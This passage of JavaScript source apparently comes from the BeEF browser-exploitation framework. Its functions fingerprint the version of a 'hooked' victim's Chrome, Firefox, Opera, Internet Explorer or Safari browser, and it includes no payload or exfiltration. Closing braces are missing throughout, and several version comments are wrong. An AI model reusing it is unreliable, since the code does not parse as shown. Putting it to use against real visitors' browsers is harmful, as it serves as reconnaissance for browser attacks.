return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 94) ? true : false);
* Returns true if Chrome 95.
* @example: beef.browser.isC95()
isC95: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 95) ? true : false);
* Returns true if Chrome for iOS 95.
* @example: beef.browser.isC95iOS()
isC95iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 95) ? true : false);
* Returns true if Chrome 96.
* @example: beef.browser.isC96()
isC96: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 96) ? true : false);
* Returns true if Chrome for iOS 96.
* @example: beef.browser.isC96iOS()
isC96iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 96) ? true : false);
* Returns true if Chrome 97.
* @example: beef.browser.isC97()
isC97: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 97) ? true : false);
* Returns true if Chrome for iOS 97.
* @example: beef.browser.isC97iOS()
isC97iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 97) ? true : false);
* Returns true if Chrome 98.
* @example: beef.browser.isC98()
isC98: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 98) ? true : false);
* Returns true if Chrome for iOS 98.
* @example: beef.browser.isC98iOS()
isC98iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 98) ? true : false);
* Returns true if Chrome 99.
* @example: beef.browser.isC99()
isC99: function () {
return (!!window.chrome && !!window.fetch && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 99) ? true : false);
* Returns true if Chrome for iOS 99.
* @example: beef.browser.isC99iOS()
isC99iOS: function () {
return (!window.webkitPerformance && window.navigator.appVersion.match(/CriOS\/(\d+)\./) != null) && ((parseInt(window.navigator.appVersion.match(/CriOS\/(\d+)\./)[1], 10) == 99) ? true : false);
* Returns true for modern versions of Chrome (above 9).
* @example: beef.browser.isCbowser()
isCbowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Chrome';
* Returns true if Chrome.
* @example: beef.browser.isC()
isC: function () {
var legacyCheck = this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC19iOS() || this.isC20() || this.isC20iOS() || this.isC21() || this.isC21iOS() || this.isC22() || this.isC22iOS() || this.isC23() || this.isC23iOS() || this.isC24() || this.isC24iOS() || this.isC25() || this.isC25iOS() || this.isC26() || this.isC26iOS() || this.isC27() || this.isC27iOS() || this.isC28() || this.isC28iOS() || this.isC29() || this.isC29iOS() || this.isC30() || this.isC30iOS() || this.isC31() || this.isC31iOS() || this.isC32() || this.isC32iOS() || this.isC33() || this.isC33iOS() || this.isC34() || this.isC34iOS() || this.isC35() || this.isC35iOS() || this.isC36() || this.isC36iOS() || this.isC37() || this.isC37iOS() || this.isC38() || this.isC38iOS() || this.isC39() || this.isC39iOS() || this.isC40() || this.isC40iOS() || this.isC41() || this.isC41iOS() || this.isC42() || this.isC42iOS() || this.isC43() || this.isC43iOS() || this.isC44() || this.isC44iOS() || this.isC45() || this.isC45iOS() || this.isC46() || this.isC46iOS() || this.isC47() || this.isC47iOS() || this.isC48() || this.isC48iOS() || this.isC49() || this.isC49iOS() || this.isC50() || this.isC50iOS() || this.isC51() || this.isC51iOS() || this.isC52() || this.isC52iOS() || this.isC53() || this.isC53iOS() || this.isC54() || this.isC54iOS() || this.isC55() || this.isC55iOS() || this.isC56() || this.isC56iOS() || this.isC57() || this.isC57iOS() || this.isC58() || this.isC58iOS() || this.isC59() || this.isC59iOS()|| this.isC60() || this.isC60iOS()|| this.isC61() || this.isC61iOS()|| this.isC62() || this.isC62iOS()|| this.isC63() || this.isC63iOS()|| this.isC64() || this.isC64iOS()|| this.isC65() || this.isC65iOS()|| this.isC66() || this.isC66iOS()|| this.isC67() || this.isC67iOS()|| this.isC68() || this.isC68iOS()|| this.isC69() || this.isC69iOS()|| this.isC70() || this.isC70iOS()|| this.isC71() || this.isC71iOS()|| this.isC72() || this.isC72iOS()|| this.isC73() || this.isC73iOS()|| this.isC74() || this.isC74iOS()|| this.isC75() || this.isC75iOS()|| this.isC76() || this.isC76iOS()|| this.isC77() || this.isC77iOS()|| this.isC78() || this.isC78iOS()|| this.isC79() || this.isC79iOS()|| this.isC80() || this.isC80iOS()|| this.isC81() || this.isC81iOS()|| this.isC82() || this.isC82iOS()|| this.isC83() || this.isC83iOS()|| this.isC84() || this.isC84iOS()|| this.isC85() || this.isC85iOS()|| this.isC86() || this.isC86iOS()|| this.isC87() || this.isC87iOS()|| this.isC88() || this.isC88iOS()|| this.isC89() || this.isC89iOS()|| this.isC90() || this.isC90iOS()|| this.isC91() || this.isC91iOS()|| this.isC92() || this.isC92iOS()|| this.isC93() || this.isC93iOS()|| this.isC94() || this.isC94iOS()|| this.isC95() || this.isC95iOS()|| this.isC96() || this.isC96iOS()|| this.isC97() || this.isC97iOS()|| this.isC98() || this.isC98iOS()|| this.isC99() || this.isC99iOS();
return legacyCheck || this.isCbowser();
* Returns true if Opera 9.50 through 9.52.
* @example: beef.browser.isO9_52()
isO9_52: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.5/) != null));
* Returns true if Opera 9.60 through 9.64.
* @example: beef.browser.isO9_60()
isO9_60: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.6/) != null));
* Returns true if Opera 10.xx.
* @example: beef.browser.isO10()
isO10: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/10\./) != null));
* Returns true if Opera 11.xx.
* @example: beef.browser.isO11()
isO11: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/11\./) != null));
* Returns true if Opera 12.xx.
* @example: beef.browser.isO12()
isO12: function () {
return (!!window.opera && (window.navigator.userAgent.match(/Opera\/9\.80.*Version\/12\./) != null));
* Returns true if the browser is any version of Opera.
* @example: beef.browser.isObowser()
isObowser: function () {
const parser = bowser.getParser(navigator.userAgent);
const browserName = parser.getBrowserName();
return browserName == 'Opera';
* Returns true if Opera.
* @example: beef.browser.isO()
isO: function () {
var legacyCheck = this.isO9_52() || this.isO9_60() || this.isO10() || this.isO11() || this.isO12();
return legacyCheck || this.isObowser();
* Returns the type of browser being used.
* @example: beef.browser.type().IE6
* @example: beef.browser.type().FF
* @example: beef.browser.type().O
type: function () {
return {
E: this.isEdge(), // Edge any version
C5: this.isC5(), // Chrome 5
C6: this.isC6(), // Chrome 6
C7: this.isC7(), // Chrome 7
C8: this.isC8(), // Chrome 8
C9: this.isC9(), // Chrome 9
C10: this.isC10(), // Chrome 10
C11: this.isC11(), // Chrome 11
C12: this.isC12(), // Chrome 12
C13: this.isC13(), // Chrome 13
C14: this.isC14(), // Chrome 14
C15: this.isC15(), // Chrome 15
C16: this.isC16(), // Chrome 16
C17: this.isC17(), // Chrome 17
C18: this.isC18(), // Chrome 18
C19: this.isC19(), // Chrome 19
C19iOS: this.isC19iOS(), // Chrome 19 on iOS
C20: this.isC20(), // Chrome 20
C20iOS: this.isC20iOS(), // Chrome 20 on iOS
C21: this.isC21(), // Chrome 21
C21iOS: this.isC21iOS(), // Chrome 21 on iOS
C22: this.isC22(), // Chrome 22
C22iOS: this.isC22iOS(), // Chrome 22 on iOS
C23: this.isC23(), // Chrome 23
C23iOS: this.isC23iOS(), // Chrome 23 on iOS
C24: this.isC24(), // Chrome 24
C24iOS: this.isC24iOS(), // Chrome 24 on iOS
C25: this.isC25(), // Chrome 25
C25iOS: this.isC25iOS(), // Chrome 25 on iOS
C26: this.isC26(), // Chrome 26
C26iOS: this.isC26iOS(), // Chrome 26 on iOS
C27: this.isC27(), // Chrome 27
C27iOS: this.isC27iOS(), // Chrome 27 on iOS
C28: this.isC28(), // Chrome 28
C28iOS: this.isC28iOS(), // Chrome 28 on iOS
C29: this.isC29(), // Chrome 29
C29iOS: this.isC29iOS(), // Chrome 29 on iOS
C30: this.isC30(), // Chrome 30
C30iOS: this.isC30iOS(), // Chrome 30 on iOS
C31: this.isC31(), // Chrome 31
C31iOS: this.isC31iOS(), // Chrome 31 on iOS
C32: this.isC32(), // Chrome 32
C32iOS: this.isC32iOS(), // Chrome 32 on iOS
C33: this.isC33(), // Chrome 33
C33iOS: this.isC33iOS(), // Chrome 33 on iOS
C34: this.isC34(), // Chrome 34
C34iOS: this.isC34iOS(), // Chrome 34 on iOS
C35: this.isC35(), // Chrome 35
C35iOS: this.isC35iOS(), // Chrome 35 on iOS
C36: this.isC36(), // Chrome 36
C36iOS: this.isC36iOS(), // Chrome 36 on iOS
C37: this.isC37(), // Chrome 37
C37iOS: this.isC37iOS(), // Chrome 37 on iOS
C38: this.isC38(), // Chrome 38
C38iOS: this.isC38iOS(), // Chrome 38 on iOS
C39: this.isC39(), // Chrome 39
C39iOS: this.isC39iOS(), // Chrome 39 on iOS
C40: this.isC40(), // Chrome 40
C40iOS: this.isC40iOS(), // Chrome 40 on iOS
C41: this.isC41(), // Chrome 41
C41iOS: this.isC41iOS(), // Chrome 41 on iOS
C42: this.isC42(), // Chrome 42
C42iOS: this.isC42iOS(), // Chrome 42 on iOS
C43: this.isC43(), // Chrome 43
C43iOS: this.isC43iOS(), // Chrome 43 on iOS
C44: this.isC44(), // Chrome 44
C44iOS: this.isC44iOS(), // Chrome 44 on iOS
C45: this.isC45(), // Chrome 45
C45iOS: this.isC45iOS(), // Chrome 45 on iOS
C46: this.isC46(), // Chrome 46
C46iOS: this.isC46iOS(), // Chrome 46 on iOS
C47: this.isC47(), // Chrome 47
C47iOS: this.isC47iOS(), // Chrome 47 on iOS
C48: this.isC48(), // Chrome 48
C48iOS: this.isC48iOS(), // Chrome 48 on iOS
C49: this.isC49(), // Chrome 49
C49iOS: this.isC49iOS(), // Chrome 49 on iOS
C50: this.isC50(), // Chrome 50
C50iOS: this.isC50iOS(), // Chrome 50 on iOS
C51: this.isC51(), // Chrome 51
C51iOS: this.isC51iOS(), // Chrome 51 on iOS
C52: this.isC52(), // Chrome 52
C52iOS: this.isC52iOS(), // Chrome 52 on iOS
C53: this.isC53(), // Chrome 53
C53iOS: this.isC53iOS(), // Chrome 53 on iOS
C54: this.isC54(), // Chrome 54
C54iOS: this.isC54iOS(), // Chrome 54 on iOS
C55: this.isC55(), // Chrome 55
C55iOS: this.isC55iOS(), // Chrome 55 on iOS
C56: this.isC56(), // Chrome 56
C56iOS: this.isC56iOS(), // Chrome 56 on iOS
C57: this.isC57(), // Chrome 57
C57iOS: this.isC57iOS(), // Chrome 57 on iOS
C58: this.isC58(), // Chrome 58
C58iOS: this.isC58iOS(), // Chrome 58 on iOS
C63iOS: this.isC63iOS(),
C: this.isC(), // Chrome any version
FF2: this.isFF2(), // Firefox 2
FF3: this.isFF3(), // Firefox 3
FF3_5: this.isFF3_5(), // Firefox 3.5
FF3_6: this.isFF3_6(), // Firefox 3.6
FF4: this.isFF4(), // Firefox 4
FF5: this.isFF5(), // Firefox 5
FF6: this.isFF6(), // Firefox 6
FF7: this.isFF7(), // Firefox 7
FF8: this.isFF8(), // Firefox 8
FF9: this.isFF9(), // Firefox 9
FF10: this.isFF10(), // Firefox 10
FF11: this.isFF11(), // Firefox 11
FF12: this.isFF12(), // Firefox 12
FF13: this.isFF13(), // Firefox 13
FF14: this.isFF14(), // Firefox 14
FF15: this.isFF15(), // Firefox 15
FF16: this.isFF16(), // Firefox 16
FF17: this.isFF17(), // Firefox 17
FF18: this.isFF18(), // Firefox 18
FF19: this.isFF19(), // Firefox 19
FF20: this.isFF20(), // Firefox 20
FF21: this.isFF21(), // Firefox 21
FF22: this.isFF22(), // Firefox 22
FF23: this.isFF23(), // Firefox 23
FF24: this.isFF24(), // Firefox 24
FF25: this.isFF25(), // Firefox 25
FF26: this.isFF26(), // Firefox 26
FF27: this.isFF27(), // Firefox 27
FF28: this.isFF28(), // Firefox 28
FF29: this.isFF29(), // Firefox 29
FF30: this.isFF30(), // Firefox 30
FF31: this.isFF31(), // Firefox 31
FF32: this.isFF32(), // Firefox 32
FF33: this.isFF33(), // Firefox 33
FF34: this.isFF34(), // Firefox 34
FF35: this.isFF35(), // Firefox 35
FF36: this.isFF36(), // Firefox 36
FF37: this.isFF37(), // Firefox 37
FF38: this.isFF38(), // Firefox 38
FF39: this.isFF39(), // Firefox 39
FF40: this.isFF40(), // Firefox 40
FF41: this.isFF41(), // Firefox 41
FF42: this.isFF42(), // Firefox 42
FF43: this.isFF43(), // Firefox 43
FF44: this.isFF44(), // Firefox 44
FF45: this.isFF45(), // Firefox 45
FF46: this.isFF46(), // Firefox 46
FF47: this.isFF47(), // Firefox 47
FF48: this.isFF48(), // Firefox 48
FF49: this.isFF49(), // Firefox 49
FF50: this.isFF50(), // Firefox 50
FF51: this.isFF51(), // Firefox 51
FF52: this.isFF52(), // Firefox 52
FF53: this.isFF53(), // Firefox 53
FF54: this.isFF54(), // Firefox 54
FF55: this.isFF55(), // Firefox 55
FF56: this.isFF56(), // Firefox 56
FF57: this.isFF57(), // Firefox 57
FF58: this.isFF58(), // Firefox 58
FF59: this.isFF59(), // Firefox 59
FF60: this.isFF60(), // Firefox 60
FF61: this.isFF61(), // Firefox 61
FF62: this.isFF62(), // Firefox 62
FF63: this.isFF63(), // Firefox 63
FF64: this.isFF64(), // Firefox 64
FF65: this.isFF65(), // Firefox 65
FF66: this.isFF66(), // Firefox 66
FF67: this.isFF67(), // Firefox 67
FF68: this.isFF68(), // Firefox 68
FF69: this.isFF69(), // Firefox 69
FF70: this.isFF70(), // Firefox 70
FF71: this.isFF71(), // Firefox 71
FF72: this.isFF72(), // Firefox 72
FF73: this.isFF73(), // Firefox 73
FF74: this.isFF74(), // Firefox 74
FF75: this.isFF75(), // Firefox 75
FF76: this.isFF76(), // Firefox 76
FF77: this.isFF77(), // Firefox 77
FF78: this.isFF78(), // Firefox 78
FF79: this.isFF79(), // Firefox 79
FF80: this.isFF80(), // Firefox 70
FF81: this.isFF81(), // Firefox 81
FF82: this.isFF82(), // Firefox 82
FF83: this.isFF83(), // Firefox 83
FF84: this.isFF84(), // Firefox 85
FF85: this.isFF85(), // Firefox 85
FF86: this.isFF86(), // Firefox 85
FF87: this.isFF87(), // Firefox 87
FF88: this.isFF88(), // Firefox 85
FF89: this.isFF89(), // Firefox 85
FF90: this.isFF90(), // Firefox 80
FF91: this.isFF91(), // Firefox 95
FF92: this.isFF92(), // Firefox 92
FF93: this.isFF93(), // Firefox 95
FF94: this.isFF94(), // Firefox 94
FF95: this.isFF95(), // Firefox 95
FF96: this.isFF96(), // Firefox 96
FF97: this.isFF97(), // Firefox 97
FF98: this.isFF98(), // Firefox 98
FF99: this.isFF99(), // Firefox 99
FF: this.isFF(), // Firefox any version
IE6: this.isIE6(), // Internet Explorer 6
IE7: this.isIE7(), // Internet Explorer 7
IE8: this.isIE8(), // Internet Explorer 8
IE9: this.isIE9(), // Internet Explorer 9
IE10: this.isIE10(), // Internet Explorer 10
IE11: this.isIE11(), // Internet Explorer 11
IE: this.isIE(), // Internet Explorer any version
O9_52: this.isO9_52(), // Opera 9.50 through 9.52
O9_60: this.isO9_60(), // Opera 9.60 through 9.64
O10: this.isO10(), // Opera 10.xx
O11: this.isO11(), // Opera 11.xx
O12: this.isO12(), // Opera 12.xx
O: this.isO(), // Opera any version
EP: this.isEpi(), // Epiphany any version
S4: this.isS4(), // Safari 4.xx
S5: this.isS5(), // Safari 5.xx
S6: this.isS6(), // Safari 6.x
S7: this.isS7(), // Safari 7.x
S8: this.isS8(), // Safari 8.x
S: this.isS() // Safari any version
* Returns the major version of the browser being used.
* @return: {String} version number || 'UNKNOWN'.
* @example: beef.browser.getBrowserVersion()
getBrowserVersion: function () {
if (this.isEdge()) {
try {
return platform.version;
} catch(e) {
return 'unknown';
; // Microsoft Edge
if (this.isC5()) {
return '5'
; // Chrome 5
if (this.isC6()) {
return '6'
; // Chrome 6
if (this.isC7()) {
return '7'
; // Chrome 7
if (this.isC8()) {
return '8'
; // Chrome 8
if (this.isC9()) {
return '9'
; // Chrome 9
if (this.isC10()) {
return '10'
; // Chrome 10
if (this.isC11()) {
return '11'
; // Chrome 11
if (this.isC12()) {
return '12'
; // Chrome 12
if (this.isC13()) {
return '13'
; // Chrome 13
if (this.isC14()) {
return '14'
; // Chrome 14
if (this.isC15()) {
return '15'
; // Chrome 15
if (this.isC16()) {
return '16'
; // Chrome 16
if (this.isC17()) {
return '17'
; // Chrome 17
if (this.isC18()) {
return '18'
; // Chrome 18
if (this.isC19()) {
return '19'
; // Chrome 19
if (this.isC19iOS()) {
return '19'
; // Chrome 19 for iOS
if (this.isC20()) {
return '20'
; // Chrome 20
if (this.isC20iOS()) {
return '20'
; // Chrome 20 for iOS
if (this.isC21()) {
return '21'
; // Chrome 21
if (this.isC21iOS()) {
return '21'
; // Chrome 21 for iOS
if (this.isC22()) {
return '22'
; // Chrome 22
if (this.isC22iOS()) {
return '22'
; // Chrome 22 for iOS
if (this.isC23()) {
return '23'
; // Chrome 23
if (this.isC23iOS()) {
return '23'
; // Chrome 23 for iOS
if (this.isC24()) {
return '24'
; // Chrome 24
if (this.isC24iOS()) {
return '24'
; // Chrome 24 for iOS
if (this.isC25()) {
return '25'
; // Chrome 25
if (this.isC25iOS()) {
return '25'
; // Chrome 25 for iOS
if (this.isC26()) {
return '26'
; // Chrome 26
if (this.isC26iOS()) {
return '26'
; // Chrome 26 for iOS
if (this.isC27()) {
return '27'
; // Chrome 27
if (this.isC27iOS()) {
return '27'
; // Chrome 27 for iOS
if (this.isC28()) {
return '28'
; // Chrome 28
if (this.isC28iOS()) {
return '28'
; // Chrome 28 for iOS
if (this.isC29()) {
return '29'
; // Chrome 29
if (this.isC29iOS()) {
return '29'
; // Chrome 29 for iOS
if (this.isC30()) {
return '30'
; // Chrome 30
if (this.isC30iOS()) {
return '30'
; // Chrome 30 for iOS
if (this.isC31()) {
return '31'
; // Chrome 31
if (this.isC31iOS()) {
return '31'
; // Chrome 31 for iOS
if (this.isC32()) {
return '32'
; // Chrome 32
if (this.isC32iOS()) {
return '32'
; // Chrome 32 for iOS
if (this.isC33()) {
return '33'
; // Chrome 33
if (this.isC33iOS()) {
return '33'
; // Chrome 33 for iOS
if (this.isC34()) {
return '34'
; // Chrome 34
if (this.isC34iOS()) {
return '34'
; // Chrome 34 for iOS
if (this.isC35()) {
return '35'
; // Chrome 35
if (this.isC35iOS()) {
return '35'
; // Chrome 35 for iOS
if (this.isC36()) {
return '36'
; // Chrome 36
if (this.isC36iOS()) {
return '36'
; // Chrome 36 for iOS
if (this.isC37()) {
return '37'
; // Chrome 37
if (this.isC37iOS()) {
return '37'
; // Chrome 37 for iOS
if (this.isC38()) {
return '38'
; // Chrome 38
if (this.isC38iOS()) {
return '38'
; // Chrome 38 for iOS
if (this.isC39()) {
return '39'
; // Chrome 39
if (this.isC39iOS()) {
return '39'
; // Chrome 39 for iOS
if (this.isC40()) {
return '40'
; // Chrome 40
if (this.isC40iOS()) {
return '40'
; // Chrome 40 for iOS
if (this.isC41()) {
return '41'
; // Chrome 41
if (this.isC41iOS()) {
return '41'
; // Chrome 41 for iOS
if (this.isC42()) {
return '42'
; // Chrome 42
if (this.isC42iOS()) {
return '42'
; // Chrome 42 for iOS
if (this.isC43()) {
return '43'
; // Chrome 43
if (this.isC43iOS()) {
return '43'
; // Chrome 43 for iOS
if (this.isC44()) {
return '44'
; // Chrome 44
if (this.isC44iOS()) {
return '44'
; // Chrome 44 for iOS
if (this.isC45()) {
return '45'
; // Chrome 45
if (this.isC45iOS()) {
return '45'
; // Chrome 45 for iOS
if (this.isC46()) {
return '46'
;// Chrome 46
if (this.isC46iOS()) {
return '46'
; // Chrome 46 for iOS
if (this.isC47()) {
return '47'
;// Chrome 47
if (this.isC47iOS()) {
return '47'
; // Chrome 47 for iOS
if (this.isC48()) {
return '48'
;// Chrome 48
if (this.isC48iOS()) {
return '48'
; // Chrome 48 for iOS
if (this.isC49()) {
return '49'
;// Chrome 49
if (this.isC49iOS()) {
return '49'
; // Chrome 49 for iOS
if (this.isC50()) {
return '50'
;// Chrome 50
if (this.isC50iOS()) {
return '50'
; // Chrome 50 for iOS
if (this.isC51()) {
return '51'
;// Chrome 51
if (this.isC51iOS()) {
return '51'
; // Chrome 51 for iOS
if (this.isC52()) {
return '52'
;// Chrome 52
if (this.isC52iOS()) {
return '52'
; // Chrome 52 for iOS
if (this.isC53()) {
return '53'
;// Chrome 53
if (this.isC53iOS()) {
return '53'
; // Chrome 53 for iOS
if (this.isC54()) {
return '54'
;// Chrome 54
if (this.isC54iOS()) {
return '54'
; // Chrome 54 for iOS
if (this.isC55()) {
return '55'
;// Chrome 55
if (this.isC55iOS()) {
return '55'
; // Chrome 55 for iOS
if (this.isC56()) {
return '56'
;// Chrome 56
if (this.isC56iOS()) {
return '56'
; // Chrome 56 for iOS
if (this.isC57()) {
return '57'
;// Chrome 57
if (this.isC57iOS()) {
return '57'
; // Chrome 57 for iOS
if (this.isC58()) {
return '58'
;// Chrome 58
if (this.isC58iOS()) {
return '58'
; // Chrome 58 for iOS
if (this.isFF2()) {
return '2'
; // Firefox 2
if (this.isFF3()) {
return '3'
; // Firefox 3
if (this.isFF3_5()) {
return '3.5'
; // Firefox 3.5
if (this.isFF3_6()) {
return '3.6'
; // Firefox 3.6
if (this.isFF4()) {
return '4'
; // Firefox 4
if (this.isFF5()) {
return '5'
; // Firefox 5
if (this.isFF6()) {
return '6'
; // Firefox 6
if (this.isFF7()) {
return '7'
; // Firefox 7
if (this.isFF8()) {
return '8'
; // Firefox 8
if (this.isFF9()) {
return '9'
; // Firefox 9
if (this.isFF10()) {
return '10'
; // Firefox 10
if (this.isFF11()) {
return '11'
; // Firefox 11
if (this.isFF12()) {
return '12'
; // Firefox 12
if (this.isFF13()) {
return '13'
; // Firefox 13
if (this.isFF14()) {
return '14'
; // Firefox 14
if (this.isFF15()) {
return '15'
; // Firefox 15
if (this.isFF16()) {
return '16'
; // Firefox 16
if (this.isFF17()) {
return '17'
; // Firefox 17
if (this.isFF18()) {
return '18'
; // Firefox 18
if (this.isFF19()) {
return '19'
; // Firefox 19
if (this.isFF20()) {
return '20'
; // Firefox 20
if (this.isFF21()) {
return '21'
; // Firefox 21
if (this.isFF22()) {
return '22'
; // Firefox 22
if (this.isFF23()) {
return '23'
; // Firefox 23
if (this.isFF24()) {
return '24'
; // Firefox 24
if (this.isFF25()) {
return '25'
; // Firefox 25
if (this.isFF26()) {
return '26'
; // Firefox 26
if (this.isFF27()) {
return '27'
; // Firefox 27
if (this.isFF28()) {
return '28'
; // Firefox 28
if (this.isFF29()) {
return '29'
; // Firefox 29
if (this.isFF30()) {
return '30'
; // Firefox 30
if (this.isFF31()) {
return '31'
; // Firefox 31
if (this.isFF32()) {
return '32'
; // Firefox 32
if (this.isFF33()) {
return '33'
; // Firefox 33
if (this.isFF34()) {
return '34'
; // Firefox 34
if (this.isFF35()) {
return '35'
; // Firefox 35
if (this.isFF36()) {
return '36'
; // Firefox 36
if (this.isFF37()) {
return '37'
; // Firefox 37
if (this.isFF38()) {
return '38'
; // Firefox 38
if (this.isFF39()) {
return '39'
; // Firefox 39
if (this.isFF40()) {
return '40'
; // Firefox 40
if (this.isFF41()) {
return '41'
; // Firefox 41
if (this.isFF42()) {
return '42'
; // Firefox 42
if (this.isFF43()) {
return '43'
; // Firefox 43
if (this.isFF44()) {
return '44'
; // Firefox 44
if (this.isFF45()) {
return '45'
; // Firefox 45
if (this.isFF46()) {
return '46'
; // Firefox 46
if (this.isFF47()) {
return '47'
; // Firefox 47
if (this.isFF48()) {
return '48'
; // Firefox 48
if (this.isFF49()) {
return '49'
; // Firefox 49
if (this.isFF50()) {
return '50'
; // Firefox 50
if (this.isFF51()) {
return '51'
; // Firefox 51
if (this.isFF52()) {
return '52'
; // Firefox 52
if (this.isFF53()) {
return '53'
; // Firefox 53
if (this.isFF54()) {
return '54'
; // Firefox 54
if (this.isFF55()) {
return '55'
; // Firefox 55
if (this.isFF56()) {
return '56'
; // Firefox 56
if (this.isFF57()) {
return '57'
; // Firefox 57
if (this.isFF58()) {
return '58'
; // Firefox 58
if (this.isFF59()) {
return '59'
; // Firefox 59
if (this.isFF60()) {
return '60'
; // Firefox 60
if (this.isFF61()) {
return '61'
; // Firefox 61
if (this.isFF62()) {
return '62'
; // Firefox 62
if (this.isFF63()) {
return '63'
; // Firefox 63
if (this.isFF64()) {
return '64'
; // Firefox 64
if (this.isFF65()) {
return '65'
; // Firefox 65
if (this.isFF66()) {
return '66'
; // Firefox 66
if (this.isFF67()) {
return '67'
; // Firefox 67
if (this.isFF68()) {
return '68'
; // Firefox 68
if (this.isFF69()) {
return '69'
; // Firefox 69
if (this.isFF70()) {
return '70'
; // Firefox 70
if (this.isFF71()) {
return '71'
; // Firefox 71
if (this.isFF72()) {
return '72'
; // Firefox 72
if (this.isFF73()) {
return '73'
; // Firefox 73
if (this.isFF74()) {
return '74'
; // Firefox 74
if (this.isFF75()) {
return '75'
; // Firefox 75
if (this.isFF76()) {
return '76'
; // Firefox 76
if (this.isFF77()) {
return '77'
; // Firefox 77
if (this.isFF78()) {
return '78'
; // Firefox 78
if (this.isFF79()) {
return '79'
; // Firefox 79
if (this.isFF80()) {
return '80'
; // Firefox 80
if (this.isFF81()) {
return '81'
; // Firefox 81
if (this.isFF82()) {
return '82'
; // Firefox 82
if (this.isFF83()) {
return '83'
; // Firefox 83
if (this.isFF84()) {
return '84'
; // Firefox 84
if (this.isFF85()) {
return '85'
; // Firefox 85
if (this.isFF86()) {
return '86'
; // Firefox 86
if (this.isFF87()) {
return '87'
; // Firefox 87
if (this.isFF88()) {
return '88'
; // Firefox 88
if (this.isFF89()) {
return '89'
; // Firefox 89
if (this.isFF90()) {
return '90'
; // Firefox 90
if (this.isFF91()) {
return '91'
; // Firefox 91
if (this.isFF92()) {
return '92'
; // Firefox 92
if (this.isFF93()) {
return '93'
; // Firefox 93
if (this.isFF94()) {
return '94'
; // Firefox 94
if (this.isFF95()) {
return '95'
; // Firefox 95
if (this.isFF96()) {
return '96'
; // Firefox 96
if (this.isFF97()) {
return '97'
; // Firefox 97
if (this.isFF98()) {
return '98'
; // Firefox 98
if (this.isFF99()) {
return '99'
; // Firefox 99
if (this.isIE6()) {
return '6'
; // Internet Explorer 6
if (this.isIE7()) {
return '7'
; // Internet Explorer 7
if (this.isIE8()) {
return '8'
; // Internet Explorer 8
if (this.isIE9()) {
return '9'
; // Internet Explorer 9
if (this.isIE10()) {
return '10'
; // Internet Explorer 10
if (this.isIE11()) {
return '11'
; // Internet Explorer 11
if (this.isEdge()) {
return '1'
; // Microsoft Edge
if (this.isEpi()) {
// believe the UserAgent string for version info - until whenever
var epiphanyRe = /Epiphany\/(\d+)/;
var versionDetails = epiphanyRe.exec( beef.browser.getBrowserReportedName());
if (versionDetails.length > 1) {
return versionDetails[1];
} else {
return "UNKNOWN"; // returns from here or it may take Safari version details
; // Epiphany
if (this.isS4()) {
return '4'
; // Safari 4
if (this.isS5()) {
return '5'
; // Safari 5
if (this.isS6()) {
return '6'
; // Safari 6
if (this.isS7()) {
return '7'
; // Safari 7
if (this.isS8()) {
return '8'
; // Safari 8
if (this.isO9_52()) {
return '9.5'
; // Opera 9.5x
if (this.isO9_60()) {
return '9.6'
; // Opera 9.6
if (this.isO10()) {
return '10'
; // Opera 10.xx
if (this.isO11()) {
return '11'
; // Opera 11.xx
if (this.isO12()) {
return '12'
; // Opera 12.xx
// platform.js
try {
var version = platform.version;
if (!!version)
return version;
} catch (e) {}
return 'UNKNOWN'; // Unknown UA
* Returns the type of user agent by hooked browser.
* @return: {String} User agent software.
* @example: beef.browser.getBrowserName()
getBrowserName: function () {
if (this.isEdge()) {
return 'E'
; // Microsoft Edge any version
if (this.isC()) {
return 'C'
; // Chrome any version
if (this.isFF()) {
return 'FF'
; // Firefox any version
if (this.isIE()) {
return 'IE'
; // Internet Explorer any version
if (this.isO()) {
return 'O'
; // Opera any version
if (this.isEpi()) {
return 'EP'
; // Epiphany any version
if (this.isS()) {
return 'S'
; // Safari any version
if (this.isA()) {
return 'A'
; // Avant any version
if (this.isMidori()) {
return 'MI'
; // Midori any version
if (this.isOdyssey()) {
return 'OD'
; // Odyssey any version
if (this.isBrave()) {
return 'BR'
; // Brave any version
